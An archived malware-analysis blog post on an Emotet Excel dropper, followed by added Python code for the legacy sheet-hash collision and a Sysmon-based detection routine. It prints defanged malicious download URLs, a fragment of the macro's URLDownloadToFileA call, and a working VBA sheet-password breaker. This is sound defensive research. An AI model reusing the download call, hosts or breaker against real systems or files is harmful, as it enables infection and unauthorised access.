Emotet Campaign
By Ilan Duhin · Published: 2023-02-28 · Archived: 2026-04-05 21:08:32 UTC
5 min read · Feb 26, 2023

Executive Summary:

In recent months there has been an extensive campaign in Europe of the malware called "Emotet". The malware arrives as an Excel file that tries to communicate with a number of URLs and, in the end, downloads four DLL files to the machine. Emotet calls the CreateDirectoryA API to create a folder where the files are saved locally on the computer, and from there they are run through regsvr32.exe.

(Image: Emotet behavior)

Static Analysis:

OLE Tools:

Checking the file structure with the OLE tools, we get a clue that the workbook contains 6 sheets.

Checking the capabilities of the file with malwoverview.py gives some further clues.

Getting into the third stream and extracting its strings, we find 4 suspicious URLs. The file contains a macro, and we also find all the cells that contain the whole code.

Dynamic Analysis:

First, when we tried to open the Excel file (Office 2021) we noticed that it opened without the "Enable Content" pop-up. After a little research: that yellow bar is what the Office 2007–2013 versions show. Since 2022 Microsoft blocks macros by default in Office files downloaded from the internet (files carrying the Mark of the Web), so newer versions no longer offer the one-click option of enabling them.
To enable macros we need to change the Trust Center macro setting as in the picture below (in Office 2007/2013 the macro runs by clicking "Enable Content"):

(Image: Trust Center macro settings)

We need to save the file and open it again. And now...

When we press the button, four messages pop up.

(Image: child processes of Excel)

Looking at the child processes of Excel and clicking on regsvr32.exe, you can see that the macro uses it to execute the malware. The workbook acts as a dropper: it generates a folder and places its DLL there.

Opening the workbook in Excel and following the static investigation, we see the 6 sheets that were hidden from the victim.

Each sheet is password-protected. To get a working password we use the "password breaker for VBA" macro.
Source: https://www.instructables.com/VBA-Code-To-Unlock-A-Locked-Excel-Sheet/

Sub PasswordBreaker()
    ' Breaks worksheet password protection.
    ' Tries every 12-character string of eleven 'A'/'B' characters followed
    ' by one printable ASCII character against the active sheet.
    Dim i As Integer, j As Integer, k As Integer
    Dim l As Integer, m As Integer, n As Integer
    Dim i1 As Integer, i2 As Integer, i3 As Integer
    Dim i4 As Integer, i5 As Integer, i6 As Integer
    On Error Resume Next    ' a wrong password raises an error; keep going
    For i = 65 To 66: For j = 65 To 66: For k = 65 To 66
    For l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66
    For i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66
    For i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126
    ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
        Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
        Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
    If ActiveSheet.ProtectContents = False Then
        MsgBox "One usable password is " & Chr(i) & Chr(j) & _
            Chr(k) & Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & _
            Chr(i3) & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
        Exit Sub
    End If
    Next: Next: Next: Next: Next: Next
    Next: Next: Next: Next: Next: Next
End Sub

To insert the VBA code press ALT+F11, paste it into a module and run it. Run the password breaker on every sheet: Excel shows a message box with a usable password for the selected sheet. Note that this is a hash collision rather than the original password. The legacy .xls worksheet-protection hash is only 16 bits wide, which is why a search over eleven 'A'/'B' characters plus one printable character is enough. We can verify from the right-click menu that the sheet was "Protected".

Sheet 1 data:

(Image: sheet 1 cells)

Sheet 2 data:

(Image: sheet 2 cells)

When we reorganize the strings we see four URLs:
- URLDownloadToFileA", "JCCB", 0, "https://audioselec.c[o]m/about/dDw5ggtyMojggTqhc
- https://geringer-muehle.[de]/wp-admin/G/
- http://intolove.co.[uk]/wp-admin/FbGhiWtrEzrQ/
- http://isc.net.[ua]/themes/3rU/

The "JCCB" argument-type string next to URLDownloadToFileA is how an Excel 4.0 (XLM) macro calls that urlmon export through CALL(), so the download is done by the spreadsheet itself before any DLL runs.

Sheet 3 data:

Sheet 4 data:

(Image: sheet 4 cells) Another two URLs that we saw earlier.

Sheet 5 data:

(Image: sheet 5 cells)

Sheet 6 data: contains the directions for how to assemble the strings.

DLL Analysis:

Export function number 18.

(Image: DLL exports)

After running the DLL we found a few interesting strings in the memory tab.
(Image: memory strings)

In addition, it drops itself upon execution to the following path:

(Image: drop path)

When analyzing the memory strings of the DLL in VirusTotal we got a description of Emotet.

Conclusions:

· The macros reach out to download and execute the Emotet malware.
· The Excel file uses macros to reach out to web URLs.
· Emotet does its execution via regsvr32.exe.
· The Emotet DLL is downloaded to a randomly generated folder under %UserProfile%\AppData\Local.

Source: https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
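Why the PasswordBreaker macro above finds a password so quickly, as an added example that is not part of the original article: the legacy .xls worksheet-protection hash is 16 bits wide and processes the password with a 15-bit rotate-and-XOR, so the search space of eleven 'A'/'B' characters plus one printable character (2^11 × 95 candidates) always reaches every possible hash value. The code below reimplements that hash in Python and runs the same search offline. The "original" password is a constructed value for the demonstration; the hash algorithm is the documented BIFF sheet-protection hash, and the candidate pattern is exactly the one the VBA loops enumerate.

```python
"""Legacy Excel (.xls) worksheet-protection hash and the A/B collision search.

Added example, not code from the original article.  The hash follows the
documented BIFF algorithm; the target password below is constructed.
"""

from itertools import product
from typing import Optional


def excel_sheet_hash(password: str) -> int:
    """16-bit legacy worksheet protection hash (ASCII passwords assumed).

    Characters are consumed from the end of the string.  Before each XOR the
    accumulator is rotated left by one within 15 bits; afterwards it is mixed
    with the password length and the constant 0xCE4B.
    """
    h = 0
    for ch in reversed(password):
        h = ((h >> 14) & 1) | ((h << 1) & 0x7FFF)  # rotate left, 15-bit
        h ^= ord(ch)
    h = ((h >> 14) & 1) | ((h << 1) & 0x7FFF)
    h ^= len(password)
    h ^= 0xCE4B
    return h


def find_colliding_password(target_hash: int) -> Optional[str]:
    """Same candidate space as the VBA PasswordBreaker: eleven characters from
    {'A', 'B'} followed by one printable ASCII character (codes 32..126)."""
    for prefix in product("AB", repeat=11):
        base = "".join(prefix)
        for n in range(32, 127):
            candidate = base + chr(n)
            if excel_sheet_hash(candidate) == target_hash:
                return candidate
    return None


def demo() -> dict:
    # Constructed example: the password the sheet author supposedly chose.
    # Excel only stores its 16-bit hash, so any colliding string unprotects it.
    original = "S3cret-Sh33t!"
    target = excel_sheet_hash(original)
    collision = find_colliding_password(target)
    return {
        "original": original,
        "hash": target,
        "collision": collision,
        "collision_hash": excel_sheet_hash(collision) if collision else None,
    }


if __name__ == "__main__":
    r = demo()
    print(f"hash of {r['original']!r}: 0x{r['hash']:04X}")
    print(f"colliding password from the A/B search: {r['collision']!r}")
```

The A/B prefix works because each 'A'/'B' choice toggles a pair of adjacent bits at a different rotation offset, and the final printable character covers the remaining bits; together they span every 15-bit state, so a collision exists for any stored hash. This only applies to the legacy .xls format the analysed sample uses; modern .xlsx sheet protection uses a salted, iterated SHA hash and is not broken by this search.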
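The behaviours in the conclusions (Excel spawning regsvr32.exe, a DLL written into a freshly created folder directly under %LocalAppData%, and lookups of the download hosts found in the sheets) translate into a small detection routine. The code below is an added example, not from the original post: it runs over constructed Sysmon-style event records (Event ID 1 process creation, 11 file creation, 22 DNS query, with the real Sysmon field names Image, ParentImage, CommandLine, TargetFilename and QueryName), and the folder and DLL names in the sample events are made up, since the article only shows them in screenshots. The download hosts are taken, defanged, from the article and refanged at runtime.

```python
"""Detection logic for the Emotet workbook behaviour over Sysmon-style events.

Added example, not code from the original article.  Event records are
constructed; only the defanged download URLs come from the article.
"""

import re
from typing import Dict, List

# Download URLs recovered from the hidden sheets, kept defanged in source.
DEFANGED_URLS = [
    "https://audioselec.c[o]m/about/dDw5ggtyMojggTqhc",
    "https://geringer-muehle.[de]/wp-admin/G/",
    "http://intolove.co.[uk]/wp-admin/FbGhiWtrEzrQ/",
    "http://isc.net.[ua]/themes/3rU/",
]


def refang_host(url: str) -> str:
    """Remove the [] defanging and return the lower-cased host of a URL."""
    url = url.replace("[", "").replace("]", "")
    return re.sub(r"^https?://", "", url).split("/", 1)[0].lower()


C2_HOSTS = {refang_host(u) for u in DEFANGED_URLS}

# A DLL written into a directory that sits directly under %LocalAppData%,
# i.e. the randomly named folder Emotet creates with CreateDirectoryA.
LOCALAPPDATA_DLL = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\[^\\]+\\[^\\]+\.dll$", re.I
)
CMDLINE_LOCALAPPDATA_DLL = re.compile(r"\\appdata\\local\\[^\\]+\\[^\\ ]+\.dll", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[str]:
    """Return one alert string per suspicious event, in input order."""
    alerts: List[str] = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1:  # process creation
            parent = basename(ev.get("ParentImage", ""))
            child = basename(ev.get("Image", ""))
            cmd = ev.get("CommandLine", "")
            if parent == "excel.exe" and child == "regsvr32.exe":
                alerts.append(f"excel.exe spawned regsvr32.exe: {cmd}")
            elif child == "regsvr32.exe" and CMDLINE_LOCALAPPDATA_DLL.search(cmd):
                alerts.append(f"regsvr32.exe loading a DLL from %LocalAppData%: {cmd}")
        elif eid == 11:  # file creation
            target = ev.get("TargetFilename", "")
            if basename(ev.get("Image", "")) == "excel.exe" and LOCALAPPDATA_DLL.match(target):
                alerts.append(f"excel.exe wrote a DLL under %LocalAppData%: {target}")
        elif eid == 22:  # DNS query
            q = ev.get("QueryName", "").lower()
            if q in C2_HOSTS:
                alerts.append(f"DNS lookup of known download host: {q}")
    return alerts


EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
# Constructed sample events (folder "Fgtr" and "oxnv1.dll" are made-up names).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": EXCEL, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"EXCEL.EXE" invoice.xls'},
    {"EventID": 22, "Image": EXCEL, "QueryName": "geringer-muehle.de"},
    {"EventID": 11, "Image": EXCEL,
     "TargetFilename": r"C:\Users\victim\AppData\Local\Fgtr\oxnv1.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": EXCEL,
     "CommandLine": r"C:\Windows\System32\regsvr32.exe /S C:\Users\victim\AppData\Local\Fgtr\oxnv1.dll"},
    # benign noise that must not fire
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"},
    {"EventID": 11, "Image": EXCEL,
     "TargetFilename": r"C:\Users\victim\AppData\Local\Temp\~DF1234.TMP"},
    {"EventID": 22, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "QueryName": "www.example.com"},
]


if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print(line)
```

The process-tree rule (Excel as parent of regsvr32.exe) is the most durable of the three, since it does not depend on the download hosts, which rotate between campaigns; the file-write rule is deliberately narrow (one folder level under AppData\Local, .dll extension) to keep Office's own temp files from firing it.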